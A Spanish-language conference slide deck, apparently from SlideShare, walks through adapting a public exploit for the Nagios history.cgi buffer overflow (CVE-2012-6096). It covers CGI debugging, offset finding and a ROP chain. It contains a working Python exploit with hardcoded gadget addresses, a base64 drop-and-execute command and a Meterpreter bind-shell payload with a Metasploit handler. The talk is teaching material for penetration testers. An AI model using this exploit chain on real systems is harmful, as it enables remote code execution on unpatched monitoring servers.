SlideShare ist ein Scribd-Unternehmen logo
1 von 50
‹#› 
ADAPTANDO EXPLOITS PARA 
EVITAR LA FRUSTRACIÓN 
Satellite Edition 
Rooted Satellite Valencia
‹#› 
Rooted Satellite Valencia 
$ whois jselvi 
Jose Selvi 
+10 años trabajando en seguridad 
Principal Penetration Tester & 
Forensics Analyst 
SANS Institute Community 
Instructor 
GIAC Security Expert (GSE) 
Twitter: @JoseSelvi 
Blog: http://www.pentester.es
‹#› 
“Hola Mundo” de público 
¿Quién de vosotros ha tocado alguna vez 
un ordenador? Sí, con Windows también 
vale… 
Rooted Satellite Valencia
‹#› 
Lo más frustrante del mundo 
Rooted Satellite Valencia
‹#› 
Algo casi tan frustrante… 
El sistema, según su versión, ES vulnerable. 
Sabemos que no está “backported”. 
Sin embargo, el exploit no funciona… 
Rooted Satellite Valencia
‹#› 
¡Vamos a ello! 
Pentesting & Exploiting 
Vulnerabilidad CVE-2012-6096 
Exploit público 
Cómo depurar un CGI 
Sobreescribiendo la “Return Address” 
Construyendo un nuevo ROP 
Exploit funcional 
Rooted Satellite Valencia
‹#› 
Exploiting en el Pentesting 
Rooted Satellite Valencia 
Exploiting 
Script 
Kiddie 
Pentester Pentester++ Security 
Researcher
‹#› 
¡Vamos a ello! 
Pentesting & Exploiting 
Vulnerabilidad CVE-2012-6096 
Exploit público 
Cómo depurar un CGI 
Sobreescribiendo la “Return Address” 
Construyendo un nuevo ROP. 
Exploit funcional. 
Rooted Satellite Valencia
‹#› 
La vulnerabilidad 
Publicada en: http://list.grok.org.uk/pipemail/full-disclosure/ 
2012-December/089125.html 
“history.cgi is vulnerable to a buffer overflow due to 
the use of sprintf with user supplied data that has 
not been restricted in size. This vulnerability does 
not appear to be exploitable on the majority of 
systems (due to stack cookies, the NX bit, etc).” 
http://server/nagios/cgi-bin/ 
history.cgi?host=AAAAAAAAAAAAAAAAA 
Rooted Satellite Valencia 
AAAAAA…
‹#› 
¡Vamos a ello! 
Pentesting & Exploiting 
Vulnerabilidad CVE-2012-6096 
Exploit público 
Cómo depurar un CGI 
Sobreescribiendo la “Return Address” 
Construyendo un nuevo ROP 
Exploit funcional 
Rooted Satellite Valencia
‹#› 
El exploit público 
Programado por @bl4sty: https://twitter.com/bl4sty 
Colgado en Pastebin: http://pastebin.com/FJUNyTaj 
Rooted Satellite Valencia
‹#› 
Buffer Overflow 
Rooted Satellite Valencia
‹#› 
Buffer Overflow 
CMD: Comando a ejecutar 
A’s: Suficientes para 
sobreescribir “Return Address” 
ROP: Para ejecutar el CMD 
Rooted Satellite Valencia
‹#› 
Creando el CMD 
echo BASE64ENCODE | base64 -d | tee 
/tmp/x 
chmod +x /tmp/x ; /tmp/x 
sed ’s/ /${IFS}/g’ 
Rooted Satellite Valencia
‹#› 
Rooted Satellite Valencia 
Shellcode
‹#› 
Buffer Overflow 
CMD: Comando a ejecutar 
A’s: Suficientes para 
sobreescribir “Return Address” 
ROP: Para ejecutar el CMD 
Rooted Satellite Valencia
‹#› 
¿Qué es ROP? 
Rooted Satellite Valencia 
Return Oriented 
Programming (ROP). 
Evolución / inspirado en 
return-to-libc. 
Usado para evitar la 
protección de pila no 
ejecutable (NX).
‹#› 
Rooted Satellite Valencia 
¿Qué es NX? 
Si nuestro shellcode se 
encuentra en una página 
no ejecutable, no 
podemos saltar a él. 
Non-eXecution Bit. 
Marca páginas de la 
memoria como no 
ejecutables.
‹#› 
ROP en nuestro exploit 
Rooted Satellite Valencia
‹#› 
¿Qué es ASLR? 
Rooted Satellite Valencia 
Address Space Layer 
Randomization. 
Las librerías se cargan 
en zonas de memoria 
“aleatorias”. 
Dificultan encontrar 
“gadgets” para formar un 
ROP. 
system() 
int system() 
{ 
[…] 
} 
AAAAAA 
AAAAAA 
AAAAAA 
AAAAAA 
AAAAAA 
AAAAAA
‹#› 
Evadiendo NX y ASLR 
En ocasiones alguna librería u otro elemento 
presente en la memoria no se encuentra compilado 
con soporte para ASLR y puede permitirnos 
utilizarlo para buscar gadgets. 
El propio cuerpo del binario puede no estar 
compilado con PIE (Process Independent 
Execution), con lo que su posición en memoria será 
siempre la misma. 
En este caso, los CGI de Nagios no se encuentran 
compilados de esta forma, por lo que vamos a 
poder utilizarlos. 
Rooted Satellite Valencia
‹#› 
¿Qué es PLT / GOT? 
Rooted Satellite Valencia 
Procedure Linkage 
Table (PLT). 
Global Offset Table 
(GOT). 
Sin PIE, expone 
algunas funciones 
en direcciones 
estáticas.
‹#› 
Nuestro ROP en acción 
Rooted Satellite Valencia 
unescape() 
0x popret 
var hostbuf 
system( 
) 
0xdeafbabe 
var hostbuf 
unescape(hostbuf) 
system(hostbuf) 
0xdeafbabe()
‹#› 
Lanzando el exploit 
Rooted Satellite Valencia
‹#› 
¿Por qué no funciona? 
La compilación del binario puede ser diferente y por 
lo tanto las posiciones de memoria que hemos 
utilizado para el ROP y la separación entre el Buffer 
y la “Return Address” puede ser diferentes. 
Necesitamos analizar el binario del nuevo sistema 
para poder localizar los gadgets adecuados y poder 
adaptar el exploit a esta nuevo objetivo. 
Rooted Satellite Valencia
‹#› 
¡Vamos a ello! 
Pentesting & Exploiting 
Vulnerabilidad CVE-2012-6096 
Exploit público 
Cómo depurar un CGI 
Sobreescribiendo la “Return Address” 
Construyendo un nuevo ROP 
Exploit funcional 
Rooted Satellite Valencia
I'm guessing you're trying to execute the CGI from a command line. 
In order to do that, you need to set the REQUEST_METHOD environment variable 
to either "GET", "HEAD", or "POST". When using the GET and HEAD methods, 
arguments can be passed to the CGI by setting the "QUERY_STRING" environment 
variable. If you’re using the POST method, data is read from standard input. Also of 
note: if you've enabled authentication in the CGIs, you must set the 
“REMOTE_USER" environment variable to be the name of the user you’re 
"authenticated" as. 
‹#› 
(no) Depurando un CGI 
$ /usr/local/nagios/sbin/history.cgi 
getcgivars(): Unsupported REQUEST_METHOD -> '' 
Rooted Satellite Valencia
‹#› 
¿Cómo funciona un CGI? 
CLIENT APACHE CGI 
Request 
Response 
Rooted Satellite Valencia 
Run CGI 
Pass CGI Env 
Response
‹#› 
Depurando un CGI 
$ export REMOTE_USER='nagiosadmin' 
$ export REQUEST_METHOD='GET' 
$ export QUERY_STRING="host=foo" 
$ /usr/local/nagios/sbin/history.cgi 
Cache-Control: no-store 
Pragma: no-cache 
Last-Modified: Mon, 20 Jan 2014 19:16:51 GMT 
Expires: Thu, 01 Jan 1970 00:00:00 GMT 
Content-type: text/html 
<html> 
<head><title>CGI TEST</title></head> 
<body> 
HELLO WORLD! 
</body> 
</html> 
Rooted Satellite Valencia
‹#› 
¡Vamos a ello! 
Pentesting & Exploiting 
Vulnerabilidad CVE-2012-6096 
Exploit público 
Cómo depurar un CGI 
Sobreescribiendo la “Return Address” 
Construyendo un nuevo ROP 
Exploit funcional 
Rooted Satellite Valencia
‹#› 
Elige tus armas… 
RADARE 
Rooted Satellite Valencia
‹#› 
Radare2: Try it, Love it, … 
La próxima vez que de esta u otra charla similar, 
será usando 100% Radare2. 
Increiblemente potente. 
Tecnología Barcelonesa. 
https://github.com/radare/radare2 
http://radare.today 
Siguelos en Twitter @radareorg 
Rooted Satellite Valencia
‹#› 
Controlando el EIP 
$ /opt/msf4/tools/pattern_create.rb 4000 
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa[…]Fc8Fc9Fd0Fd1Fd2F 
$ export REMOTE_USER=‘nagiosadmin' 
$ export REQUEST_METHOD=‘GET' 
$ export QUERY_STRING="host=`pattern_create.rb 4000`” 
$ gdb /usr/local/nagios/sbin/history.cgi 
(gdb) run 
Starting program: /usr/local/nagios/sbin/history.cgi 
Program received signal SIGSEGV, Segmentation fault. 
0x61453661 in ?? () 
0x61 (a) 0x36 (6) 0x45 (E) 0x61 (a) 
$ /opt/msf4/tools/pattern_offset.rb a6Ea 4000 
[*] Exact match at offset 3139 
Rooted Satellite Valencia
‹#› 
-D_FORTIFY_SOURCE=2 
$ export REMOTE_USER=‘nagiosadmin' 
$ export REQUEST_METHOD=‘GET' 
$ export QUERY_STRING="host=`python -c "print 'A'*4000"`” 
$ ./history-fortify.cgi 
*** buffer overflow detected ***: ./history-fortify.cgi ======= Backtrace: 
========= 
/lib/libc.so.6(__fortify_fail+0x4d)[0x4e57ad] 
/lib/libc.so.6(+0xfa7ea)[0x4e37ea] 
/lib/libc.so.6(+0xf9f18)[0x4e2f18] 
/lib/libc.so.6(_IO_default_xsputn+0x13c)[0x457f4c] 
/lib/libc.so.6(_IO_vfprintf+0x4048)[0x42daa8] 
/lib/libc.so.6(__vsprintf_chk+0xa7)[0x4e2fc7] 
/lib/libc.so.6(__sprintf_chk+0x2d)[0x4e2f0d] 
./history-fortify.cgi[0x804a177] 
./history-fortify.cgi[0x804ae44] 
/lib/libc.so.6(__libc_start_main+0xe6)[0x3ffce6] 
./history-fortify.cgi[0x8048fc1] 
======= Memory map: ======== 
[…] 
Rooted Satellite Valencia
‹#› 
Rooted Satellite Valencia 
Stack Canary 
Protección contra 
desbordamientos de 
buffer. 
Añadida en tiempo de 
compilación si se 
emplean las opciones 
oportunas. 
Valor aleatorio situado 
en la pila, antes del EIP. 
Se comprueba su 
integridad.
‹#› 
Canary en CGI 
Rooted Satellite Valencia 
$ ./canary.bin 
Canary(0): 0xbfa3ce10 
Canary(1): 0xbfa3ce10 
Canary(2): 0xbfa3ce10 
[…] 
$ ./canary.bin 
Canary(0): 0xbfcfbcb0 
Canary(1): 0xbfcfbcb0 
Canary(2): 0xbfcfbcb0 
[…]
‹#› 
DEMO 
Rooted Satellite Valencia
‹#› 
¡Vamos a ello! 
Pentesting & Exploiting 
Vulnerabilidad CVE-2012-6096 
Exploit público 
Cómo depurar un CGI 
Sobreescribiendo la “Return Address” 
Construyendo un nuevo ROP 
Exploit funcional 
Rooted Satellite Valencia
$ rabin2 -i history.cgi 
[Imports] 
[…] 
addr=0x08048bb0 off=0x00000bb0 ordinal=016 hint=000 
bind=GLOBAL type=FUNC name=system 
[…] 
addr=0x08048e70 off=0x00000e70 ordinal=060 hint=000 
bind=GLOBAL type=FUNC name=exit 
60 imports 
‹#› 
Buscando system/exit PLT 
Rooted Satellite Valencia 
unescape() 
0x popret 
var hostbuf 
system( 
) exit( 
) 
var hostbuf
‹#› 
Buscando Pop-Ret 
Rooted Satellite Valencia 
unescape() 
0x popret 
var hostbuf 
system( 
) exit( 
) 
var hostbuf 
$ /opt/msf4/msfelfscan -p history.cgi 
0x08048f03 pop ebx; pop ebp; ret 
0x0804936b pop edi; pop ebp; ret 
0x08049ca6 pop edi; pop ebp; ret 
0x0804a6d4 pop edi; pop ebp; ret 
[…] 
$ rasm2 -a x86 -b 32 'pop ebx' 
5b
‹#› 
Buscando HostBuffer 
Rooted Satellite Valencia 
unescape() 
0x popret 
var hostbuf 
system( 
) exit( 
) 
var hostbuf 
$ export REMOTE_USER=‘nagiosadmin' 
$ export REQUEST_METHOD='GET' 
$ export QUERY_STRING="host=`python -c "print 
‘A'*4000"`" 
$ r2 -d history.cgi 
Process with PID 9270 started… 
[0x00214850]> dc 
[R2] Breakpoint recoil at 0x41414141 = 0 
[0x41414140]> s 0 
[0x00000000]> /x 414141414141414141414141 
hits: 400 
0x08079b60 hit0_0 414141414141414141414141 
[…]
‹#› 
Buscando Unescape 
Rooted Satellite Valencia 
unescape() 
0x popret 
var hostbuf 
system( 
) exit( 
) 
var hostbuf
‹#› 
DEMO 
Rooted Satellite Valencia
‹#› 
¡Vamos a ello! 
Pentesting & Exploiting 
Vulnerabilidad CVE-2012-6096 
Exploit público 
Cómo depurar un CGI 
Sobreescribiendo la “Return Address” 
Construyendo un nuevo ROP 
Exploit funcional 
Rooted Satellite Valencia
‹#› 
Ejecutando un Ping 
#!/usr/bin/python 
stackspace=0xc43 
cmd="ping -c5 127.0.0.1;" 
cmd = cmd.replace(" ", “${IFS}") 
unescape_addr='x60xc2x04x08' # 0x0804c260 
popret_addr='x04x8fx04x08' # 0x08048f04 
hostbuf_addr='x60x9bx07x08' # 0x08079b60 
system_plt_addr='xb0x8bx04x08' # 0x08048bb0 
exit_addr='x70x8ex04x08' # 0x08048e70 
rop_chain = 
unescape_addr+popret_addr+hostbuf_addr+system_plt_addr+exit_a 
ddr+hostbuf_addr 
stackspace=stackspace-len(cmd) 
exploit=cmd+'A'*stackspace+rop_chain 
$ export QUERY_STRING="host=`python exploit.py`" 
Rooted Satellite Valencia
‹#› 
DEMO 
Rooted Satellite Valencia
‹#› 
Ejecutando Shell 
$ msfpayload linux/x86/meterpreter/bind_tcp RHOST=127.0.0.1 X 
| base64 
#!/usr/bin/python 
# Meterpreter Linux x86 BindTcp 4444 
msf_payload=“f0VMRgEBAQAAAAAAAAAAAAI[…]Aid//4Q==“ 
cmd="echo "+msf_payload+"|base64 -d|tee /tmp/aaa;chmod +x 
/tmp/aaa;/tmp/aaa;" 
cmd = cmd.replace(" ", “${IFS}") 
[…] 
msf> use exploit/multi/handler 
msf> set PAYLOAD linux/x86/meterpreter/bind_tcp 
msf> set RHOST 127.0.0.1 
msf> exploit 
[*] Meterpreter session 1 opened (127.0.0.1:56602 -> 127.0.0.1:4444) 
at 2014-01-20 20:38:50 +0000 
meterpreter> 
Rooted Satellite Valencia
‹#› 
Explotación en remoto 
Rooted Satellite Valencia
‹#› 
DEMO 
Rooted Satellite Valencia
‹#› 
Jose Selvi 
http://twitter.com/JoseSelvi 
Rooted Satellite Valencia 
jselvi@pentester.es 
http://www.pentester.es 
jselvi@incide.es 
http://www.incide.es

Weitere ähnliche Inhalte

Was ist angesagt?

Elias Grande - Dagda [rootedvlc4]
Elias Grande - Dagda [rootedvlc4]Elias Grande - Dagda [rootedvlc4]
Elias Grande - Dagda [rootedvlc4]RootedCON
 
José Selvi - Unprivileged Network Post-Exploitation [RootedCON 2011]
José Selvi - Unprivileged Network Post-Exploitation [RootedCON 2011]José Selvi - Unprivileged Network Post-Exploitation [RootedCON 2011]
José Selvi - Unprivileged Network Post-Exploitation [RootedCON 2011]RootedCON
 
Abel Valero - VM + VFS = The Wooden Horse [rooted2018]
Abel Valero - VM + VFS = The Wooden Horse [rooted2018]Abel Valero - VM + VFS = The Wooden Horse [rooted2018]
Abel Valero - VM + VFS = The Wooden Horse [rooted2018]RootedCON
 
Mariano Palomo - Taller de reversing en sistemas Windows aplicado a CTFs [ro...
Mariano Palomo  - Taller de reversing en sistemas Windows aplicado a CTFs [ro...Mariano Palomo  - Taller de reversing en sistemas Windows aplicado a CTFs [ro...
Mariano Palomo - Taller de reversing en sistemas Windows aplicado a CTFs [ro...RootedCON
 
Desarrollo de rootkits en Linux [GuadalajaraCON 2013]
Desarrollo de rootkits en Linux [GuadalajaraCON 2013]Desarrollo de rootkits en Linux [GuadalajaraCON 2013]
Desarrollo de rootkits en Linux [GuadalajaraCON 2013]Websec México, S.C.
 
David López Paz - Global Warfare [RootedCON 2011]
David López Paz - Global Warfare [RootedCON 2011]David López Paz - Global Warfare [RootedCON 2011]
David López Paz - Global Warfare [RootedCON 2011]RootedCON
 
Construyendo rootkits basicos
Construyendo rootkits basicosConstruyendo rootkits basicos
Construyendo rootkits basicosTensor
 
Elías Grande & Jorge Nuñez - Medusa, El nacimiento de los ICS [rooted2019]
Elías Grande & Jorge Nuñez - Medusa, El nacimiento de los ICS [rooted2019]Elías Grande & Jorge Nuñez - Medusa, El nacimiento de los ICS [rooted2019]
Elías Grande & Jorge Nuñez - Medusa, El nacimiento de los ICS [rooted2019]RootedCON
 
Gabriel Gonzalez - Man-In-Remote: PKCS11 for fun and non-profit [RootedCON 2011]
Gabriel Gonzalez - Man-In-Remote: PKCS11 for fun and non-profit [RootedCON 2011]Gabriel Gonzalez - Man-In-Remote: PKCS11 for fun and non-profit [RootedCON 2011]
Gabriel Gonzalez - Man-In-Remote: PKCS11 for fun and non-profit [RootedCON 2011]RootedCON
 
Lw2010 - Uso De La Programacion En Linux Para La Seguridad En Redes
Lw2010 - Uso De La Programacion En Linux Para La Seguridad En RedesLw2010 - Uso De La Programacion En Linux Para La Seguridad En Redes
Lw2010 - Uso De La Programacion En Linux Para La Seguridad En Redesguest5d7f33c
 
Eduardo Blázquez - Técnicas de Ingeniería Inversa I & II [rooted2018]
Eduardo Blázquez - Técnicas de Ingeniería Inversa I & II [rooted2018]Eduardo Blázquez - Técnicas de Ingeniería Inversa I & II [rooted2018]
Eduardo Blázquez - Técnicas de Ingeniería Inversa I & II [rooted2018]RootedCON
 
Penetración con una Backdoor
Penetración con una BackdoorPenetración con una Backdoor
Penetración con una BackdoorNEGOCIOS PROPIOS
 
Conferencia Innovación en Técnicas de Ethical Hacking
Conferencia Innovación en Técnicas de Ethical HackingConferencia Innovación en Técnicas de Ethical Hacking
Conferencia Innovación en Técnicas de Ethical HackingHacking Bolivia
 
Alberto García de Dios - Virus, el arte no debería ser negocio [Rooted CON 2011]
Alberto García de Dios - Virus, el arte no debería ser negocio [Rooted CON 2011]Alberto García de Dios - Virus, el arte no debería ser negocio [Rooted CON 2011]
Alberto García de Dios - Virus, el arte no debería ser negocio [Rooted CON 2011]RootedCON
 
Cómo explotar EternalBlue en Windows Server 2012 R2
Cómo explotar EternalBlue en Windows Server 2012 R2Cómo explotar EternalBlue en Windows Server 2012 R2
Cómo explotar EternalBlue en Windows Server 2012 R2Telefónica
 
Jaime Peñalba - Como defenderse en terreno hostil: Protecciones para la Defco...
Jaime Peñalba - Como defenderse en terreno hostil: Protecciones para la Defco...Jaime Peñalba - Como defenderse en terreno hostil: Protecciones para la Defco...
Jaime Peñalba - Como defenderse en terreno hostil: Protecciones para la Defco...RootedCON
 
CPMX5 - Hacking like a boss por Roberto Salgado
CPMX5 - Hacking like a boss por Roberto SalgadoCPMX5 - Hacking like a boss por Roberto Salgado
CPMX5 - Hacking like a boss por Roberto SalgadoWebsec México, S.C.
 
Daniel González & Helena Jalain - DevSecOps y la caída de Babilonia: cómo olv...
Daniel González & Helena Jalain - DevSecOps y la caída de Babilonia: cómo olv...Daniel González & Helena Jalain - DevSecOps y la caída de Babilonia: cómo olv...
Daniel González & Helena Jalain - DevSecOps y la caída de Babilonia: cómo olv...RootedCON
 
Rooted2020 A clockwork pentester - Jose Carlos Moral & Alvaro Villaverde
Rooted2020 A clockwork pentester - Jose Carlos Moral & Alvaro VillaverdeRooted2020 A clockwork pentester - Jose Carlos Moral & Alvaro Villaverde
Rooted2020 A clockwork pentester - Jose Carlos Moral & Alvaro VillaverdeRootedCON
 

Was ist angesagt? (19)

Elias Grande - Dagda [rootedvlc4]
Elias Grande - Dagda [rootedvlc4]Elias Grande - Dagda [rootedvlc4]
Elias Grande - Dagda [rootedvlc4]
 
José Selvi - Unprivileged Network Post-Exploitation [RootedCON 2011]
José Selvi - Unprivileged Network Post-Exploitation [RootedCON 2011]José Selvi - Unprivileged Network Post-Exploitation [RootedCON 2011]
José Selvi - Unprivileged Network Post-Exploitation [RootedCON 2011]
 
Abel Valero - VM + VFS = The Wooden Horse [rooted2018]
Abel Valero - VM + VFS = The Wooden Horse [rooted2018]Abel Valero - VM + VFS = The Wooden Horse [rooted2018]
Abel Valero - VM + VFS = The Wooden Horse [rooted2018]
 
Mariano Palomo - Taller de reversing en sistemas Windows aplicado a CTFs [ro...
Mariano Palomo  - Taller de reversing en sistemas Windows aplicado a CTFs [ro...Mariano Palomo  - Taller de reversing en sistemas Windows aplicado a CTFs [ro...
Mariano Palomo - Taller de reversing en sistemas Windows aplicado a CTFs [ro...
 
Desarrollo de rootkits en Linux [GuadalajaraCON 2013]
Desarrollo de rootkits en Linux [GuadalajaraCON 2013]Desarrollo de rootkits en Linux [GuadalajaraCON 2013]
Desarrollo de rootkits en Linux [GuadalajaraCON 2013]
 
David López Paz - Global Warfare [RootedCON 2011]
David López Paz - Global Warfare [RootedCON 2011]David López Paz - Global Warfare [RootedCON 2011]
David López Paz - Global Warfare [RootedCON 2011]
 
Construyendo rootkits basicos
Construyendo rootkits basicosConstruyendo rootkits basicos
Construyendo rootkits basicos
 
Elías Grande & Jorge Nuñez - Medusa, El nacimiento de los ICS [rooted2019]
Elías Grande & Jorge Nuñez - Medusa, El nacimiento de los ICS [rooted2019]Elías Grande & Jorge Nuñez - Medusa, El nacimiento de los ICS [rooted2019]
Elías Grande & Jorge Nuñez - Medusa, El nacimiento de los ICS [rooted2019]
 
Gabriel Gonzalez - Man-In-Remote: PKCS11 for fun and non-profit [RootedCON 2011]
Gabriel Gonzalez - Man-In-Remote: PKCS11 for fun and non-profit [RootedCON 2011]Gabriel Gonzalez - Man-In-Remote: PKCS11 for fun and non-profit [RootedCON 2011]
Gabriel Gonzalez - Man-In-Remote: PKCS11 for fun and non-profit [RootedCON 2011]
 
Lw2010 - Uso De La Programacion En Linux Para La Seguridad En Redes
Lw2010 - Uso De La Programacion En Linux Para La Seguridad En RedesLw2010 - Uso De La Programacion En Linux Para La Seguridad En Redes
Lw2010 - Uso De La Programacion En Linux Para La Seguridad En Redes
 
Eduardo Blázquez - Técnicas de Ingeniería Inversa I & II [rooted2018]
Eduardo Blázquez - Técnicas de Ingeniería Inversa I & II [rooted2018]Eduardo Blázquez - Técnicas de Ingeniería Inversa I & II [rooted2018]
Eduardo Blázquez - Técnicas de Ingeniería Inversa I & II [rooted2018]
 
Penetración con una Backdoor
Penetración con una BackdoorPenetración con una Backdoor
Penetración con una Backdoor
 
Conferencia Innovación en Técnicas de Ethical Hacking
Conferencia Innovación en Técnicas de Ethical HackingConferencia Innovación en Técnicas de Ethical Hacking
Conferencia Innovación en Técnicas de Ethical Hacking
 
Alberto García de Dios - Virus, el arte no debería ser negocio [Rooted CON 2011]
Alberto García de Dios - Virus, el arte no debería ser negocio [Rooted CON 2011]Alberto García de Dios - Virus, el arte no debería ser negocio [Rooted CON 2011]
Alberto García de Dios - Virus, el arte no debería ser negocio [Rooted CON 2011]
 
Cómo explotar EternalBlue en Windows Server 2012 R2
Cómo explotar EternalBlue en Windows Server 2012 R2Cómo explotar EternalBlue en Windows Server 2012 R2
Cómo explotar EternalBlue en Windows Server 2012 R2
 
Jaime Peñalba - Como defenderse en terreno hostil: Protecciones para la Defco...
Jaime Peñalba - Como defenderse en terreno hostil: Protecciones para la Defco...Jaime Peñalba - Como defenderse en terreno hostil: Protecciones para la Defco...
Jaime Peñalba - Como defenderse en terreno hostil: Protecciones para la Defco...
 
CPMX5 - Hacking like a boss por Roberto Salgado
CPMX5 - Hacking like a boss por Roberto SalgadoCPMX5 - Hacking like a boss por Roberto Salgado
CPMX5 - Hacking like a boss por Roberto Salgado
 
Daniel González & Helena Jalain - DevSecOps y la caída de Babilonia: cómo olv...
Daniel González & Helena Jalain - DevSecOps y la caída de Babilonia: cómo olv...Daniel González & Helena Jalain - DevSecOps y la caída de Babilonia: cómo olv...
Daniel González & Helena Jalain - DevSecOps y la caída de Babilonia: cómo olv...
 
Rooted2020 A clockwork pentester - Jose Carlos Moral & Alvaro Villaverde
Rooted2020 A clockwork pentester - Jose Carlos Moral & Alvaro VillaverdeRooted2020 A clockwork pentester - Jose Carlos Moral & Alvaro Villaverde
Rooted2020 A clockwork pentester - Jose Carlos Moral & Alvaro Villaverde
 

Andere mochten auch

Jorge Bermúdez - Botnets y troyanos: los artículos 197 y 264 CP llevados a la...
Jorge Bermúdez - Botnets y troyanos: los artículos 197 y 264 CP llevados a la...Jorge Bermúdez - Botnets y troyanos: los artículos 197 y 264 CP llevados a la...
Jorge Bermúdez - Botnets y troyanos: los artículos 197 y 264 CP llevados a la...RootedCON
 
Chema Alonso - Dorking, Pentesting & Hacking con Android Apps [rootedvlc2]
Chema Alonso - Dorking, Pentesting & Hacking con Android Apps [rootedvlc2]Chema Alonso - Dorking, Pentesting & Hacking con Android Apps [rootedvlc2]
Chema Alonso - Dorking, Pentesting & Hacking con Android Apps [rootedvlc2]RootedCON
 
Layakk - Atacando 3G Vol. 2 [rootedvlc2]
Layakk - Atacando 3G Vol. 2 [rootedvlc2]Layakk - Atacando 3G Vol. 2 [rootedvlc2]
Layakk - Atacando 3G Vol. 2 [rootedvlc2]RootedCON
 
RootedSatellite Valencia - Charla inaugural [RootedSatellite Valencia]
RootedSatellite Valencia - Charla inaugural [RootedSatellite Valencia]RootedSatellite Valencia - Charla inaugural [RootedSatellite Valencia]
RootedSatellite Valencia - Charla inaugural [RootedSatellite Valencia]RootedCON
 
Leonardo Nve - Explotando cambios en servidores DNS [RootedSatellite Valencia]
Leonardo Nve - Explotando cambios en servidores DNS [RootedSatellite Valencia]Leonardo Nve - Explotando cambios en servidores DNS [RootedSatellite Valencia]
Leonardo Nve - Explotando cambios en servidores DNS [RootedSatellite Valencia]RootedCON
 
Cesar Lorenzana & Javier Rodríguez – Por qué lo llaman APT´s, cuando lo que q...
Cesar Lorenzana & Javier Rodríguez – Por qué lo llaman APT´s, cuando lo que q...Cesar Lorenzana & Javier Rodríguez – Por qué lo llaman APT´s, cuando lo que q...
Cesar Lorenzana & Javier Rodríguez – Por qué lo llaman APT´s, cuando lo que q...RootedCON
 
Alberto Cita - Skype Sin Levita. Un análisis de seguridad y privacidad [Roote...
Alberto Cita - Skype Sin Levita. Un análisis de seguridad y privacidad [Roote...Alberto Cita - Skype Sin Levita. Un análisis de seguridad y privacidad [Roote...
Alberto Cita - Skype Sin Levita. Un análisis de seguridad y privacidad [Roote...RootedCON
 
Lorenzo Martínez - Cooking an APT in the paranoid way [RootedSatellite Valen...
Lorenzo Martínez  - Cooking an APT in the paranoid way [RootedSatellite Valen...Lorenzo Martínez  - Cooking an APT in the paranoid way [RootedSatellite Valen...
Lorenzo Martínez - Cooking an APT in the paranoid way [RootedSatellite Valen...RootedCON
 
Jorge Ramió - RSA cumple 36 años y se le ha caducado el carné joven [Rooted C...
Jorge Ramió - RSA cumple 36 años y se le ha caducado el carné joven [Rooted C...Jorge Ramió - RSA cumple 36 años y se le ha caducado el carné joven [Rooted C...
Jorge Ramió - RSA cumple 36 años y se le ha caducado el carné joven [Rooted C...RootedCON
 
Raul Siles - iOS: Regreso al futuro [Rooted CON 2014]
Raul Siles - iOS: Regreso al futuro [Rooted CON 2014]Raul Siles - iOS: Regreso al futuro [Rooted CON 2014]
Raul Siles - iOS: Regreso al futuro [Rooted CON 2014]RootedCON
 
Pablo San Emeterio - How to protect your hot pics with WHF [RootedSatellite V...
Pablo San Emeterio - How to protect your hot pics with WHF [RootedSatellite V...Pablo San Emeterio - How to protect your hot pics with WHF [RootedSatellite V...
Pablo San Emeterio - How to protect your hot pics with WHF [RootedSatellite V...RootedCON
 
David Pérez y José Pico - I wanna jam it wid you [RootedSatellite Valencia]
David Pérez y José Pico - I wanna jam it wid you [RootedSatellite Valencia]David Pérez y José Pico - I wanna jam it wid you [RootedSatellite Valencia]
David Pérez y José Pico - I wanna jam it wid you [RootedSatellite Valencia]RootedCON
 
Cesar Lorenzana - Picoletos en Rootedland [RootedSatellite Valencia]
Cesar Lorenzana - Picoletos en Rootedland [RootedSatellite Valencia]Cesar Lorenzana - Picoletos en Rootedland [RootedSatellite Valencia]
Cesar Lorenzana - Picoletos en Rootedland [RootedSatellite Valencia]RootedCON
 
Aladdin Gurbanov – Magnetic Road [Rooted CON 2014]
Aladdin Gurbanov – Magnetic Road [Rooted CON 2014]Aladdin Gurbanov – Magnetic Road [Rooted CON 2014]
Aladdin Gurbanov – Magnetic Road [Rooted CON 2014]RootedCON
 
Pau Oliva – Bypassing wifi pay-walls with Android [Rooted CON 2014]
Pau Oliva – Bypassing wifi pay-walls with Android [Rooted CON 2014]Pau Oliva – Bypassing wifi pay-walls with Android [Rooted CON 2014]
Pau Oliva – Bypassing wifi pay-walls with Android [Rooted CON 2014]RootedCON
 
Manu Quintans & Frank Ruiz – 50 shades of crimeware [Rooted CON 2014]
Manu Quintans & Frank Ruiz – 50 shades of crimeware [Rooted CON 2014]Manu Quintans & Frank Ruiz – 50 shades of crimeware [Rooted CON 2014]
Manu Quintans & Frank Ruiz – 50 shades of crimeware [Rooted CON 2014]RootedCON
 
Pablo San Emeterio López & Jaime Sánchez – WhatsApp, mentiras y cintas de vid...
Pablo San Emeterio López & Jaime Sánchez – WhatsApp, mentiras y cintas de vid...Pablo San Emeterio López & Jaime Sánchez – WhatsApp, mentiras y cintas de vid...
Pablo San Emeterio López & Jaime Sánchez – WhatsApp, mentiras y cintas de vid...RootedCON
 
Vicente Díaz - Birds, bots and machines - Fraud in Twitter and how to detect ...
Vicente Díaz - Birds, bots and machines - Fraud in Twitter and how to detect ...Vicente Díaz - Birds, bots and machines - Fraud in Twitter and how to detect ...
Vicente Díaz - Birds, bots and machines - Fraud in Twitter and how to detect ...RootedCON
 
Hugo Teso - Profundizando en la seguridad de la aviación [Rooted CON 2014]
Hugo Teso - Profundizando en la seguridad de la aviación [Rooted CON 2014]Hugo Teso - Profundizando en la seguridad de la aviación [Rooted CON 2014]
Hugo Teso - Profundizando en la seguridad de la aviación [Rooted CON 2014]RootedCON
 
Alfonso Muñoz – Ocultación de comunicaciones en lenguaje natural [Rooted CON ...
Alfonso Muñoz – Ocultación de comunicaciones en lenguaje natural [Rooted CON ...Alfonso Muñoz – Ocultación de comunicaciones en lenguaje natural [Rooted CON ...
Alfonso Muñoz – Ocultación de comunicaciones en lenguaje natural [Rooted CON ...RootedCON
 

Andere mochten auch (20)

Jorge Bermúdez - Botnets y troyanos: los artículos 197 y 264 CP llevados a la...
Jorge Bermúdez - Botnets y troyanos: los artículos 197 y 264 CP llevados a la...Jorge Bermúdez - Botnets y troyanos: los artículos 197 y 264 CP llevados a la...
Jorge Bermúdez - Botnets y troyanos: los artículos 197 y 264 CP llevados a la...
 
Chema Alonso - Dorking, Pentesting & Hacking con Android Apps [rootedvlc2]
